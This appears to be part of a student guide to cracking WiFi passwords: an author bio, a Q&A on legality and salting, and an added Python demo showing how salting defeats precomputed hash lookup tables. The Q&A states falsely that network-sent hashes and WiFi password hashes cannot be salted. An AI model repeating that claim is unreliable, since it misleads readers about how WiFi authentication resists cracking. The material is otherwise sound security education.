In addition to Computer Security, I am an avid music player and love composing music.
Three years ago, one semester after I had taken my first ever CS course, I applied to an internship in offensive cybersecurity. Having zero knowledge of what that actually was, I quickly bombed the practical interview (and did not receive the internship). However, I thought that the stuff I was supposed to know how to do was pretty cool. So I spent the last few years learning offensive cybersecurity practices, spending two summers working as a penetration tester. Next year I will work full-time for the company that I initially got rejected by. It has been a fun journey and I am excited to continue my learning! In addition to hacking, I grew up in Vermont and enjoy any outdoor/adventure activity (skiing, surfing, mountain biking, hiking, etc.).
Email: jstan327@gmail.com
Ever since school computers started to roll out with restricted privileges, I was always wondering how to get around them.
Obviously, for practical purposes, things like Task Manager would not be accessible to the student user account, which meant that when things inevitably froze, I had no ability to do anything.
This drove me down the rabbit hole of hacking, and as a result I learned so much more about how to keep my own account secure.
Now, I use lengthy unique passwords everywhere, and even carry a 2FA key on my keychain.
Where can you go from here?
While what we have shown here is specific to cracking WiFi passwords, a lot of the base techniques are the same across many different types of attacks. Pretty much any hash-cracking attack will use the principles taught here in this guide. What changes is how the hashes are obtained. Many password, credit card, and other sensitive information leaks that you hear about in the news end the same way: Hash cracking. If you’re interested in these other types of attacks, we encourage you to learn more! We unfortunately do not cover those types of attacks in this guide.
Questions and Answers
No, this guide is for Mac only.
NO. You may only try this on a WiFi network that you own / have explicit permission to experiment on, such as your home WiFi network. Any unauthorized attempts at breaking into a private network are illegal. We take no responsibility for such actions.
First, what is a salted password hash? A salted hash is just like a hash we have previously learned about in this tutorial, except that before hashing the password, a random string (the salt) is appended to the password. Salting is an effective security method for protecting stored password hashes as it makes each hash harder to crack. Specifically, the attacker needs to be able to guess the length of the password plus the random salt to crack the salted hash. A server may employ salting to protect stored hashes, but a hash that is being sent over a network cannot have a salt. (This means, for example, that WiFi passwords cannot be salted.) This is because there is no way to securely convey what the salt is across the network. If a computer is requesting access via a hashed password, there is no way for that computer to understand the authentication server's salt. Hence all password hashes sent for authorization must not be salted. In conclusion, yes, this tutorial should work even in a system where passwords are salted, but that is not a concern of this guide as WiFi password hashes are not salted [11].
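To make the salted-versus-unsalted point concrete, here is an added Python example (not from the original guide). It builds a lookup table of unsalted SHA-256 hashes from a constructed wordlist, then shows that the table recovers an unsalted hash with a single dictionary lookup but finds nothing for a salted one, that the same password salted twice stores as two different values, and that once the salt is known the search is back to hashing every candidate one by one, paying the full iteration cost each time. SHA-256 and PBKDF2-HMAC are stand-ins chosen for the demo, not what WiFi or any particular server uses; the wordlist and passwords are made up.

```python
"""Why salting matters, shown with a precomputed table against a small wordlist.

Added example, not code from the original guide. Hash functions, salt sizes
and the wordlist are constructed for the demonstration.
"""
import hashlib
import os

# Constructed wordlist in the same one-per-line spirit as rockyou.txt.
WORDLIST = ["123456", "password", "iloveyou", "rewardbarrel058", "qwerty"]


def unsalted_hash(password):
    """Plain SHA-256 of the password: same input, same output, every time."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt, iterations=100_000):
    """PBKDF2-HMAC-SHA256 with a per-password salt, as a server should store it."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def build_lookup_table(wordlist):
    """Hash the wordlist once; afterwards any unsalted digest is a dict lookup."""
    return {unsalted_hash(pw): pw for pw in wordlist}


def lookup(table, digest):
    """Return the password for a digest if it is in the table, else None."""
    return table.get(digest)


def guess_with_known_salt(stored, salt, wordlist, iterations=100_000):
    """With the salt known, every candidate must be re-hashed under that salt.

    Precomputation no longer helps: the cost is wordlist size times the
    iteration count, which is exactly the slowdown a server is buying.
    """
    for pw in wordlist:
        if salted_hash(pw, salt, iterations) == stored:
            return pw
    return None


def demo():
    """Run the three comparisons and return their outcomes."""
    table = build_lookup_table(WORDLIST)
    pw = "rewardbarrel058"

    # 1. Unsalted: the stored digest equals the table entry, so it is found
    #    without computing a single new hash.
    unsalted_found = lookup(table, unsalted_hash(pw))

    # 2. Salted: the stored value depends on a random salt, so no table built
    #    ahead of time can contain it (random salt constructed here, as a
    #    server would do per account).
    salt = os.urandom(16)
    salted_found = lookup(table, salted_hash(pw, salt))

    # 3. Two accounts with the same password store different values, so one
    #    recovered password reveals nothing about the other.
    salt_a, salt_b = os.urandom(16), os.urandom(16)
    salts_differ = salted_hash(pw, salt_a) != salted_hash(pw, salt_b)

    return {
        "unsalted_found": unsalted_found,
        "salted_found": salted_found,
        "salts_differ": salts_differ,
    }


if __name__ == "__main__":
    print(demo())
    fixed_salt = os.urandom(16)
    print(guess_with_known_salt(salted_hash("qwerty", fixed_salt), fixed_salt, WORDLIST))
```

The design choice worth noticing is in guess_with_known_salt(): the salt stops reuse of work across targets and across time, but it does not stop a targeted dictionary run, which is why the iteration count (and a password that is not on any list) still carries the real weight.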